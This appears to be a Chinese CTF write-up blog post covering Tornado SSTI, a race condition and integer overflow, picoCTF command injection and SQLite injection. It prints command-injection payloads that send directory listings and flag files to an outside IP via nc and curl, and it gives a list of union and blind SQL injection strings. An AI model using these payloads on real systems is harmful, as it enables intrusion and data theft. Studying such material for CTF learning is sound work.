<!DOCTYPE html>
<html>
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="utf-8">
  
  <title>近期比赛学习总结 | Iuhrey的幻想乡</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="前记最近又陷入了自闭自闭又自闭的环节，先是pico高中生比赛被吊打，接着又是inctf被吊打，周末又被护网杯题目弄自闭，对此只能说自己技术太菜，总结一下最近新学到的知识点吧（由于比赛打完之后环境关了，所以只能结合大师傅们的wp进行复现）。   easy tornado这是护网杯的签到题，说句实话一开始打就知道这一次比赛又是凶多吉少，点进去发现有三个文件：12345678Orz.txt render">
<meta name="keywords" content="比赛心得">
<meta property="og:type" content="article">
<meta property="og:title" content="近期比赛学习总结">
<meta property="og:url" content="http://yoursite.com/2018/10/15/近期比赛学习总结/index.html">
<meta property="og:site_name" content="Iuhrey的幻想乡">
<meta property="og:description" content="前记最近又陷入了自闭自闭又自闭的环节，先是pico高中生比赛被吊打，接着又是inctf被吊打，周末又被护网杯题目弄自闭，对此只能说自己技术太菜，总结一下最近新学到的知识点吧（由于比赛打完之后环境关了，所以只能结合大师傅们的wp进行复现）。   easy tornado这是护网杯的签到题，说句实话一开始打就知道这一次比赛又是凶多吉少，点进去发现有三个文件：12345678Orz.txt render">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="http://yoursite.com/images/19/1.png">
<meta property="og:image" content="http://yoursite.com/images/19/2.png">
<meta property="og:image" content="http://yoursite.com/images/19/3.png">
<meta property="og:image" content="http://yoursite.com/images/19/4.png">
<meta property="og:updated_time" content="2018-10-25T07:19:46.440Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="近期比赛学习总结">
<meta name="twitter:description" content="前记最近又陷入了自闭自闭又自闭的环节，先是pico高中生比赛被吊打，接着又是inctf被吊打，周末又被护网杯题目弄自闭，对此只能说自己技术太菜，总结一下最近新学到的知识点吧（由于比赛打完之后环境关了，所以只能结合大师傅们的wp进行复现）。   easy tornado这是护网杯的签到题，说句实话一开始打就知道这一次比赛又是凶多吉少，点进去发现有三个文件：12345678Orz.txt render">
<meta name="twitter:image" content="http://yoursite.com/images/19/1.png">
  
    <link rel="alternate" href="/atom.xml" title="Iuhrey的幻想乡" type="application/atom+xml">
  
  
    <link rel="icon" href="source/images/favicon.ico">
  
  
    <link href="//fonts.googleapis.com/css?family=Source+Code+Pro" rel="stylesheet" type="text/css">
  
  <link rel="stylesheet" href="/css/style.css">
  <link rel="stylesheet" href="/plugin/bganimation/bg.css">
  

</head>
</html>
<body>
  <div id="container">
    <div id="wrap">
      <div class="outer">
        <div class="widget-wrap mobile-header">
  <h3 class="widget-title"></h3>
  <div class="widget">
    <img class="avatar" src="/images/avatar.jpg">
    <h2 class="author">Iuhrey</h2>
    <h3 class="description">一个常年被吊打的Web手    一个唱歌不好指弹垃圾的吉他手</h3>
    <div class="count-box">
      <a href="/archives"><div><strong>28</strong><br>文章</div></a>
      <a href="/categories"><div><strong>2</strong><br>分类</div></a>
      <a href="/tags"><div><strong>12</strong><br>标签</div></a>
    </div>
    <ul class="blog-link">
     
          <a href="/" title="Home">
            <li>幻想乡的起点</li>
          </a>
        
          <a href="/archives" title="Archives">
            <li>幻想乡图</li>
          </a>
        
          <a href="/categories" title="Categories">
            <li>分岔路</li>
          </a>
        
          <a href="/tags" title="Tags">
            <li>路标</li>
          </a>
        
    </ul>
  </div>
</div>

        <section id="main"><article id="post-近期比赛学习总结" class="wow slideInRight article article-type-post" itemscope="" itemprop="blogPost">
  <div class="article-meta">
    <a href="/2018/10/15/近期比赛学习总结/" class="article-date">
  <time class="post-time" datetime="2018-10-15T10:22:35.000Z" itemprop="datePublished">
    <span class="post-month">10月</span><br>
    <span class="post-day">15</span>
  </time>
</a>
   
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      近期比赛学习总结
    </h1>
  

        <div>
          
  <div class="article-category">
    <a class="article-category-link" href="/categories/日常学习/">日常学习</a>
  </div>

          
              

          
        </div>
      </header>
    
    <div class="article-entry" itemprop="articleBody">
      
        <h2 id="前记"><a href="#前记" class="headerlink" title="前记"></a>前记</h2><p>最近又陷入了自闭自闭又自闭的环节，先是pico高中生比赛被吊打，接着又是inctf被吊打，周末又被护网杯题目弄自闭，对此只能说自己技术太菜，总结一下最近新学到的知识点吧（由于比赛打完之后环境关了，所以只能结合大师傅们的wp进行复现）。  </p>
<h2 id="easy-tornado"><a href="#easy-tornado" class="headerlink" title="easy tornado"></a>easy tornado</h2><p>这是护网杯的签到题，说句实话一开始打就知道这一次比赛又是凶多吉少，点进去发现有三个文件：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">Orz.txt </span><br><span class="line">render()</span><br><span class="line"></span><br><span class="line">hint.txt </span><br><span class="line">md5(cookie_secret + md5(filename))</span><br><span class="line"></span><br><span class="line">flag.txt </span><br><span class="line">/fllllllllllag</span><br></pre></td></tr></table></figure></p>
<p>赛后梳理起来，提示真是太明显了，当然这是马后炮了，render()就说明了这里用了渲染，就可能存在ssti注入，果不其然在报错页面发现了msg这个参数，通过利用msg=4测试发现返回了4，也就是说明可以通过ssti注入得到数据。<br>接着是url构成如下：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">file?filename=Orz.txt&amp;signature=9e3bb6483951e58b6095f949d572dd9a</span><br></pre></td></tr></table></figure></p>
<p>hint.txt提示签名的生成方式，以及flag.txt提示了/flllllllllllg也就是说我们只要读取这个文件夹就能得到flag，那现在问题就是通过ssti注入得到cookie_secret，通过测试发现了一个问题就是ssti注入过滤了很多东西，只能读取变量。<br>既然题目提示了easy tornado，那么我们可以查询源码找突破口，这部分直接搜索cookie发现了在handler.settings存放了cookie_secret，直接通过msg=读取出cookie_secret再通过hint中提示的签名方式生成/fllllllllg的签名读取出flag。<br>这道题目有两个点坑，导致我没做出来….一个就是报错界面了，之后一定要主要一些报错界面或者一些不太重要的界面，既然存在就有他的作用，接着第二个点就是没认真阅读tornado的源码，如果存在ssti注入那模板一定得认真阅读，特别是关于敏感信息的一些文件。  </p>
<h2 id="ltshop"><a href="#ltshop" class="headerlink" title="ltshop"></a>ltshop</h2><p>这是一道关于条件竞争以及整数溢出的题目，一开始只有20块只能买4个辣条，通过开多线程跑出来发现自己花了20元买了7个辣条，接着在兑换的时候利用整数溢出漏洞买足够辣条通过兑换flag得到flag。  </p>
<h3 id="条件竞争"><a href="#条件竞争" class="headerlink" title="条件竞争"></a>条件竞争</h3><p>条件竞争漏洞是一种服务器端的漏洞，是由于开发者设计应用程序并发处理时操作逻辑不合理而造成。当应用面临高并发的请求时未能同步好所有请求，导致请求与请求之间产生等待时出现逻辑缺陷。该漏洞一般出现在与数据库系统频繁交互的位置，例如金额同步、支付等较敏感操作处。另外条件竞争漏洞也会出现在其他位置，例如文件的操作处理等。<br>在CTF中很容易出现这种漏洞，特别是在文件操作以及金额同步的情形下，例如上面这道题目，在购买辣条时，后端操作应该是先把辣条数+1，然后再扣除费用，当我们开多线程发送多条购买辣条的请求时，服务端同时处理多条请求，同步处理不当，很有可能导致一包辣条的钱购买了多包的情况，或者是在金额即将归零时购买了辣条导致金额为负值。<br>或者是在上传文件时，服务器先将文件储存再通过检测后缀名将黑名单的文件进行删除，这里可以在文件删除之前访问文件，从而执行文件中的命令，例如可以在文件中写入file_put_contents()再生成一个shell，或者是将文件名改成白名单的文件。</p>
<h3 id="整数溢出"><a href="#整数溢出" class="headerlink" title="整数溢出"></a>整数溢出</h3><p>准确来说这并不是属于web方面的内容，但是web杂的很，结合啥的漏洞都可能出现，像之前接触到的sprintf()格式化漏洞，结合mysql就出了一道盲注题目，还有pwn方面的结合web就有了沙箱逃逸这个专题…..话不多说…<br>一般来说，整形变量有int，short，long等，但是很多程序员在使用typedef定义新整形变量时会随缘定义，这就导致一些程序在跨平台的兼容性很差，所以业界有了一个整形变量的标准。如下:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">typedef signed char             int8_t;   </span><br><span class="line">typedef short int               int16_t;  </span><br><span class="line">typedef int                     int32_t;  </span><br><span class="line">typedef long int                int64_t;    </span><br><span class="line">typedef long long int           int64_t;  </span><br><span class="line">typedef unsigned char           uint8_t;  </span><br><span class="line">typedef unsigned short int      uint16_t;  </span><br><span class="line">typedef unsigned int            uint32_t;  </span><br><span class="line">typedef unsigned long int       uint64_t;  </span><br><span class="line">typedef unsigned long long int  uint64_t;</span><br></pre></td></tr></table></figure></p>
<p>而在c中，这些整数储存占用字节如下:<br><img src="/images/19/1.png" alt=""><br>溢出的方式根据数据类型有两种不同的类型：<br>第一种上界溢出，比如short int这个类型，它储存的数据从-32678~32677，如果我们操作32677，让其加1，那它储存的数据块最后一位储存符号位的字节就被溢出的数据给更改了，也就是说直接变为了最小的-32678，如果根据算式来看就是<strong>32677+1=-32678</strong>，这种带符号位在web网页中不常见，常见的是unsigned类型，再比如说unsigned short int数据储存的范围是0~65535，要是对65535操作加1，也就变成了0，通过算式说明就是:<strong>65535+1=0</strong>，也就是说我如果在网页中购买大量商品，后台数据处理出现整数溢出，那我们就能花1件的钱来购买65537件商品。<br>第二种为下界溢出，就类似上界溢出的逆运算，利用点和上界溢出一样，就粗略带过了…</p>
<h2 id="Fancy-alive-monitoring"><a href="#Fancy-alive-monitoring" class="headerlink" title="Fancy-alive-monitoring"></a>Fancy-alive-monitoring</h2><p>直接上源码:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br></pre></td><td class="code"><pre><span class="line">&lt;html&gt;</span><br><span class="line">&lt;head&gt;</span><br><span class="line">	&lt;title&gt;Monitoring Tool&lt;/title&gt;</span><br><span class="line">	&lt;script&gt;</span><br><span class="line">	function check()&#123;</span><br><span class="line">		ip = document.getElementById(&quot;ip&quot;).value;</span><br><span class="line">		chk = ip.match(/^\d&#123;1,3&#125;\.\d&#123;1,3&#125;\.\d&#123;1,3&#125;\.\d&#123;1,3&#125;$/);</span><br><span class="line">		if (!chk) &#123;</span><br><span class="line">			alert(&quot;Wrong IP format.&quot;);</span><br><span class="line">			return false;</span><br><span class="line">		&#125; else &#123;</span><br><span class="line">			document.getElementById(&quot;monitor&quot;).submit();</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line">	&lt;/script&gt;</span><br><span class="line">&lt;/head&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line">	&lt;h1&gt;Monitoring Tool ver 0.1&lt;/h1&gt;</span><br><span class="line">	&lt;form id=&quot;monitor&quot; action=&quot;index.php&quot; method=&quot;post&quot; onsubmit=&quot;return false;&quot;&gt;</span><br><span class="line">	&lt;p&gt; Input IP address of the target host</span><br><span class="line">	&lt;input id=&quot;ip&quot; name=&quot;ip&quot; type=&quot;text&quot;&gt;</span><br><span class="line">	&lt;/p&gt;</span><br><span class="line">	&lt;input type=&quot;button&quot; value=&quot;Go!&quot; onclick=&quot;check()&quot;&gt;</span><br><span class="line">	&lt;/form&gt;</span><br><span class="line">	&lt;hr&gt;</span><br><span class="line"></span><br><span class="line">&lt;?php</span><br><span class="line">$ip = $_POST[&quot;ip&quot;];</span><br><span class="line">if ($ip) &#123;</span><br><span class="line">	// super fancy regex check!</span><br><span class="line">	if (preg_match(&apos;/^(([1-9]?[0-9]|1[0-9]&#123;2&#125;|2[0-4][0-9]|25[0-5]).)&#123;3&#125;([1-9]?[0-9]|1[0-9]&#123;2&#125;|2[0-4][0-9]|25[0-5])/&apos;,$ip)) &#123;</span><br><span class="line">		exec(&apos;ping -c 1 &apos;.$ip, $cmd_result);</span><br><span class="line">		foreach($cmd_result as $str)&#123;</span><br><span class="line">			if (strpos($str, &apos;100% packet loss&apos;) !== false)&#123;</span><br><span class="line">				printf(&quot;&lt;h3&gt;Target is NOT alive.&lt;/h3&gt;&quot;);</span><br><span class="line">				break;</span><br><span class="line">			&#125; else if (strpos($str, &apos;, 0% packet loss&apos;) !== false)&#123;</span><br><span class="line">				printf(&quot;&lt;h3&gt;Target is alive.&lt;/h3&gt;&quot;);</span><br><span class="line">				break;</span><br><span class="line">			&#125;</span><br><span class="line">		&#125;</span><br><span class="line">	&#125; else &#123;</span><br><span class="line">		echo &quot;Wrong IP Format.&quot;;</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br><span class="line">&lt;hr&gt;</span><br><span class="line">&lt;a href=&quot;index.txt&quot;&gt;index.php source code&lt;/a&gt;</span><br><span class="line">&lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br></pre></td></tr></table></figure></p>
<p>题目主要是考源码审计以及命令执行，题目在客户端和服务端分别对ip进行了检测，第一次在客户端的检测如下：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">chk = ip.match(/^\d&#123;1,3&#125;\.\d&#123;1,3&#125;\.\d&#123;1,3&#125;\.\d&#123;1,3&#125;$/);</span><br></pre></td></tr></table></figure></p>
<p>这里明显只能匹配xxx.xxx.xxx.xxx格式的ip，但是可以很简单的通过burp抓包绕过，接着看服务端的检测:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">preg_match(&apos;/^(([1-9]?[0-9]|1[0-9]&#123;2&#125;|2[0-4][0-9]|25[0-5]).)&#123;3&#125;([1-9]?[0-9]|1[0-9]&#123;2&#125;|2[0-4][0-9]|25[0-5])/&apos;,$ip</span><br></pre></td></tr></table></figure></p>
<p>这里并没有使用$限制输入ip的结束，也就是说我们只要满足前面的ip匹配即可，接着使用命令分隔符就能执行我们命令了，但是源码中并没有回显，只有这一部分回显:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">if (strpos($str, &apos;100% packet loss&apos;) !== false)&#123;</span><br><span class="line">				printf(&quot;&lt;h3&gt;Target is NOT alive.&lt;/h3&gt;&quot;);</span><br><span class="line">				break;</span><br><span class="line">			&#125; else if (strpos($str, &apos;, 0% packet loss&apos;) !== false)&#123;</span><br><span class="line">				printf(&quot;&lt;h3&gt;Target is alive.&lt;/h3&gt;&quot;);</span><br><span class="line">				break;</span><br></pre></td></tr></table></figure></p>
<p>那也就是说，我们得通过其他方式来获取回显的信息。这里提供两种方式。</p>
<h3 id="netcat监听"><a href="#netcat监听" class="headerlink" title="netcat监听"></a>netcat监听</h3><p>第一种方式就是在我们的服务器上开启一个监听端口，然后在目标机上通过nc链接，把执行的命令返回给我们的服务器。<br>首先我们开启一个端口，如下：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc -lvnp 2333</span><br></pre></td></tr></table></figure></p>
<p>接着使用目标机执行ls命令然后发给我们的服务器:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ip=127.0.0.1;ls | nc 66.42.72.66 2333</span><br></pre></td></tr></table></figure></p>
<p>我们的服务器就收到了回显：<br><img src="/images/19/2.png" alt=""><br>接着通过读取flag文件就好了:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ip=127.0.0.1;cat the-secret-1755-flag.txt | nc 66.42.72.66 2333</span><br></pre></td></tr></table></figure></p>
<p>得到flag：picoCTF{n3v3r_trust_a_b0x_36d4a875}</p>
<h3 id="带flag访问接收器"><a href="#带flag访问接收器" class="headerlink" title="带flag访问接收器"></a>带flag访问接收器</h3><p>第二种方式是通过带flag直接访问我们的服务器，把执行命令返回的内容通过赋值到一个变量然后访问我们的服务器，例如使用curl 或者是 wget命令。例如我们可以构造这样一个payload:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ip=127.0.0.1;curl http://66.42.72.66/`ls`</span><br></pre></td></tr></table></figure></p>
<p>接着我们查看日志，发现:<br><img src="/images/19/3.png" alt=""><br>我们只得到了一个文件，那就是index.php，结合使用netcat监听方法发现这是第一个文件，这是因为在/的后面只能带一个参数，所以在不清楚有多少文件的情况下，我们是没办法用倒叙或者一个一个查的，因此我们可以使用base64，把结果进行编码构成一个参数进行访问：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ip=127.0.0.1;curl http://66.42.72.66/`ls | base64`</span><br></pre></td></tr></table></figure></p>
<p>我们接收到了base64后的所有文件名:<br><img src="/images/19/4.png" alt=""><br>接着解码再读flag就行了。这也可以使用？带变量进行访问具体可以自己尝试。  </p>
<h2 id="A-Simple-Question"><a href="#A-Simple-Question" class="headerlink" title="A Simple Question"></a>A Simple Question</h2><p>这是一道考sqlite注入的题目，sql注入中这一种倒是不太常见，但是和mysql有着类似的特点。<br>一进去就发现源码泄露：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">  include &quot;config.php&quot;;</span><br><span class="line">  ini_set(&apos;error_reporting&apos;, E_ALL);</span><br><span class="line">  ini_set(&apos;display_errors&apos;, &apos;On&apos;);</span><br><span class="line"></span><br><span class="line">  $answer = $_POST[&quot;answer&quot;];</span><br><span class="line">  $debug = $_POST[&quot;debug&quot;];</span><br><span class="line">  $query = &quot;SELECT * FROM answers WHERE answer=&apos;$answer&apos;&quot;;</span><br><span class="line">  echo &quot;&lt;pre&gt;&quot;;</span><br><span class="line">  echo &quot;SQL query: &quot;, htmlspecialchars($query), &quot;\n&quot;;</span><br><span class="line">  echo &quot;&lt;/pre&gt;&quot;;</span><br><span class="line">?&gt;</span><br><span class="line">&lt;?php</span><br><span class="line">  $con = new SQLite3($database_file);</span><br><span class="line">  $result = $con-&gt;query($query);</span><br><span class="line"></span><br><span class="line">  $row = $result-&gt;fetchArray();</span><br><span class="line">  if($answer == $CANARY)  &#123;</span><br><span class="line">    echo &quot;&lt;h1&gt;Perfect!&lt;/h1&gt;&quot;;</span><br><span class="line">    echo &quot;&lt;p&gt;Your flag is: $FLAG&lt;/p&gt;&quot;;</span><br><span class="line">  &#125;</span><br><span class="line">  elseif ($row) &#123;</span><br><span class="line">    echo &quot;&lt;h1&gt;You are so close.&lt;/h1&gt;&quot;;</span><br><span class="line">  &#125; else &#123;</span><br><span class="line">    echo &quot;&lt;h1&gt;Wrong.&lt;/h1&gt;&quot;;</span><br><span class="line">  &#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure></p>
<p>简单审计发现，数据库会查询我们输入的答案，如果返回结果，那么会输出you are so close，但是如果搜索无果，那么就只会提示wrong，题目的主要思路就是通过注入的方式判断answer是什么，再通过输入answer得到flag。</p>
<h3 id="sqlite注入"><a href="#sqlite注入" class="headerlink" title="sqlite注入"></a>sqlite注入</h3><p>sqlite注入和mysql注入差不多，就是语法存在一些差异。<br>这里以字符型为例子:  </p>
<ul>
<li>查询行数：’ order by x – -  </li>
<li>查询回显位： ‘ union select 1,2,3,4,5….. – -</li>
<li>查询表名： ‘ union select 1,group_concat(tbl_name),3,4,5… from sqlite_master where type=’table’ and tbl_name not like ‘sqlite_%’ – -</li>
<li>查询列名： ‘ union select 1,group_concat(sql),3,4,5… from sqlite_master where type!=’meta’ and sql not null and name not like ‘sqlite_%’ and table=’表名’ – -</li>
<li>查询字符串： ‘ union select 1,列名,3,4,5… from 表名 – -</li>
</ul>
<p>接下来就是sqlite的布尔型注入:</p>
<ul>
<li>查询表的数量：’ and ( (select count(tbl_name) from sqlite_master where type=’table’ and tbl_name not like ‘sqlite_%’ ) = x) – -</li>
<li>查询表名长度： ‘ and ((select length(tbl_name) from sqlite_master where type=’table’ and tbl_name not like ‘sqlite_%’ limit 0 offset 1) = x) – -</li>
<li>查询表名：’ and ( (SELECT hex(substr(tbl_name,’猜解的字符位置’,1)) FROM sqlite_master WHERE type=’table’ and tbl_name NOT like ‘sqlite_%’ limit 1 offset 0) = hex(‘a’) ) – -</li>
<li>查询列名： ‘ and ((select hex(substr(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(substr((substr(sql,instr(sql,’(‘)%2b1)),instr((substr(sql,instr(sql,’(‘)%2b1)),’<code>&#39;)),&quot;TEXT&quot;,&#39;&#39;),&quot;INTEGER&quot;,&#39;&#39;),&quot;AUTOINCREMENT&quot;,&#39;&#39;),&quot;PRIMARY KEY&quot;,&#39;&#39;),&quot;UNIQUE&quot;,&#39;&#39;),&quot;NUMERIC&quot;,&#39;&#39;),&quot;REAL&quot;,&#39;&#39;),&quot;BLOB&quot;,&#39;&#39;),&quot;NOT NULL&quot;,&#39;&#39;),&quot;,&quot;,&#39;~~&#39;),&quot;</code>“,””),’猜解的字符位置’,1)) FROM sqlite_master WHERE type!=’meta’ AND sql NOT NULL AND name NOT LIKE ‘sqlite_%’ and name=’表名’) = hex(‘a’) ) – -</li>
<li>查询字符串： ‘ and ( (select hex(substr(列名),1,1)) from users limit 1 offset 0) = hex(‘a’) ) – -</li>
</ul>
<p>这些操作也不用死记住，理解查询的语法就差不多了，复杂的到时写脚本直接套就行了。</p>
<p>参考链接：<br><a href="https://ctf-wiki.github.io/ctf-wiki/pwn/linux/integeroverflow/intof/" target="_blank" rel="noopener">整数溢出原理介绍</a><br><a href="https://blog.csdn.net/Mary19920410/article/details/71518130?locationNum=4&amp;fps=1" target="_blank" rel="noopener">浅析C语言之uint8_t / uint16_t / uint32_t /uint64_t</a><br><a href="http://skysec.top/2018/10/13/2018%E6%8A%A4%E7%BD%91%E6%9D%AF-web-writeup/" target="_blank" rel="noopener">2018护网杯-web-writeup</a><br><a href="https://blog.csdn.net/qq_32400847/article/details/58756980" target="_blank" rel="noopener"><br>基于SQLite数据库的Web应用程序注入指南</a></p>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://yoursite.com/2018/10/15/近期比赛学习总结/" data-id="cjp0vwddh0025bkvjvmsphbjr" class="article-share-link">分享</a>
      
      
  <ul class="article-tag-list"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/比赛心得/">比赛心得</a></li></ul>

    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2018/11/01/结合CVE的一道命令执行弹shell的题目/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">上一篇</strong>
      <div class="article-nav-title">
        
          结合CVE的一道命令执行弹shell的题目
        
      </div>
    </a>
  
  
    <a href="/2018/10/08/关于命令执行的学习/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">下一篇</strong>
      <div class="article-nav-title">关于命令执行的初步学习</div>
    </a>
  
</nav>

  
</article>




  <div id="comments" class="comments">
    <div id="uyan_frame"></div>
  </div>
<script type="text/javascript" src="http://v2.uyan.cc/code/uyan.js?uid=2158764"></script>
</section>
        
          <aside id="sidebar">
  
    <div class="widget-wrap">
  <h3 class="widget-title"></h3>
  <div class="widget">
    <h1 class="blog-title">Iuhrey的幻想乡</h1>
    <h2 class="blog-subtitle">记录日常所学</h2>
    <ul class="blog-link">
     
          <a href="/" title="Home">
            <li>幻想乡的起点</li>
          </a>
        
          <a href="/archives" title="Archives">
            <li>幻想乡图</li>
          </a>
        
          <a href="/categories" title="Categories">
            <li>分岔路</li>
          </a>
        
          <a href="/tags" title="Tags">
            <li>路标</li>
          </a>
        
    </ul>
  </div>
</div>

  
    <div class="widget-wrap">
  <h3 class="widget-title"></h3>
  <div class="widget">
    <img class="avatar" src="/images/avatar.jpg">
    <h2 class="author">Iuhrey</h2>
    <h3 class="description">一个常年被吊打的Web手    一个唱歌不好指弹垃圾的吉他手</h3>
    <div class="count-box">
      <a href="/archives"><div><strong>28</strong><br>文章</div></a>
      <a href="/categories"><div><strong>2</strong><br>分类</div></a>
      <a href="/tags"><div><strong>12</strong><br>标签</div></a>
    </div>



    <div class="social-link">
      
        <a class="hvr-bounce-in" href="http://github.com/NoneGirlIuh" target="_blank" title="Github">
          Github
        </a>
      
    </div>

    <div class="friend-link">
      <h2>友情链接</h2>
      
        <a class="hvr-bounce-in" href="http://blog.shanamaid.top/" target="_blank" title="ShanaMaid">
          ShanaMaid
        </a>
      
        <a class="hvr-bounce-in" href="http://mozhucy.cn/" target="_blank" title="喜欢啥几把BB的狗骑驴">
          喜欢啥几把BB的狗骑驴
        </a>
      
        <a class="hvr-bounce-in" href="http://alittlexyz.cn/" target="_blank" title="喜欢gay在狗骑驴旁边的狗逼">
          喜欢gay在狗骑驴旁边的狗逼
        </a>
      
        <a class="hvr-bounce-in" href="http://zaiyewujiang.cn/" target="_blank" title="gay里gay气的大黄">
          gay里gay气的大黄
        </a>
      
        <a class="hvr-bounce-in" href="http://yulige.top/" target="_blank" title="郁离歌大手子的博客">
          郁离歌大手子的博客
        </a>
      
        <a class="hvr-bounce-in" href="http://shaobaobaoer.cn/" target="_blank" title="有很多小姐姐的烧包包">
          有很多小姐姐的烧包包
        </a>
      
    </div>
  </div>
</div>

  
</aside>
<iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width="330" height="86" src="//music.163.com/outchain/player?type=2&id=478384&auto=1&height=66"></iframe>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      &copy;2017 - 2018 Iuhrey<br>
      由<a href="http://hexo.io/" target="_blank">Hexo</a>强力驱动 | 
      主题-<a href="https://github.com/ShanaMaid/hexo-theme-shana">Shana</a>
      
        |<script src="http://s11.cnzz.com/z_stat.php?id=1273056144&web_id=1273056144" language="JavaScript"></script>
      
    </div>
<script async src="//dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>
            <span id="busuanzi_container_site_uv">本站总访问量<span id="busuanzi_value_site_uv"></span>次</span>
  </div>
</footer>
    </div>
    

<script src="//apps.bdimg.com/libs/jquery/2.1.4/jquery.min.js"></script>
<script src="//apps.bdimg.com/libs/wow/0.1.6/wow.min.js"></script>
<script>
new WOW().init();
</script>   


  <link rel="stylesheet" href="/plugin/fancybox/jquery.fancybox.css">
  <script src="/plugin/fancybox/jquery.fancybox.pack.js"></script>



  <section class="hidden-xs"> 
  <ul class="cb-slideshow"> 
    <li><span>苟利</span></li> 
    <li><span>国家</span></li> 
    <li><span>生死以</span></li> 
    <li><span>岂能</span></li> 
    <li><span>祸福</span></li> 
    <li><span>趋避之</span></li> 
  </ul>
</section>
<script src="/js/script.js"></script>



  </div>
</body>
</html>